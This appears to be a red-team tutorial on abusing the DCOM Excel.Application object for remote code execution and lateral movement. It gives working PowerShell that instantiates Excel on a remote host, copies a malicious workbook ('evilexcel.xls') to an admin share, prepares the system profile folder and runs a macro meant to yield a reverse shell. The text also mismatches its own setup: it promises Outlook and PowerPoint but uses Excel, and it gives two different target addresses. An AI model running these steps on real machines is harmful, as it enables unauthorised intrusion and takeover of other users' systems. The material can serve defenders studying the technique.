Distributed Component Object Model

DCOM is a binary-interface standard for software components. It enables inter-process communication object creation in a large range of programming languages.

DCOM is carried over RPC through port 135. Local Administrator privilege is necessary to call upon the DCOM service control manager.

Microsoft Office

In this section we are going to explore DCOM objects related to Microsoft Office through the user of Outlook and Powerpoint.

In order to be able to use the DCOM we have to figure out the list of methods available. First we create an instance of the object using powershell and CreateInstance method of the System.Activator class.

This will need the type of instance as input, so we will use the program identifier and GetTypeFromProgID method to get the type.

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))

$com | Get-Member

$com | Get-Member will display the available objects and methods.

From the output listed, "Run" method is the most interesting as it enables us to execute VBA code remotely.

The payload for getting a reverse shell can be prepared using the steps mentioned in,

GitBook

Now with the file generated, there are 3 things to be done,

• Send the file to the other computer, SMB should be enabled

• Specify the excel document that the macro belongs to

• Enable profile if you are operating as System Account (required only under mentioned circumstance)

• Run the macro

The following code is for getting through the above mentioned steps,

#Step 1
$LocalPath = "C:\Users\john.p42\evilexcel.xls"

$RemotePath = "\\192.168.1.10\c$\evilexcel.xls"

[System.IO.File]::Copy($LocalPath, $RemotePath, $True)

#Step 3

$Path = "\\192.168.1.10\c$\Windows\sysWOW64\config\systemprofile\Desktop"

$temp = [system.io.directory]::createDirectory($Path)

#Step 2

$Workbook = $com.Workbooks.Open("C:\evilexcel.xls")

#Step 4

$com.Run("evilmacro")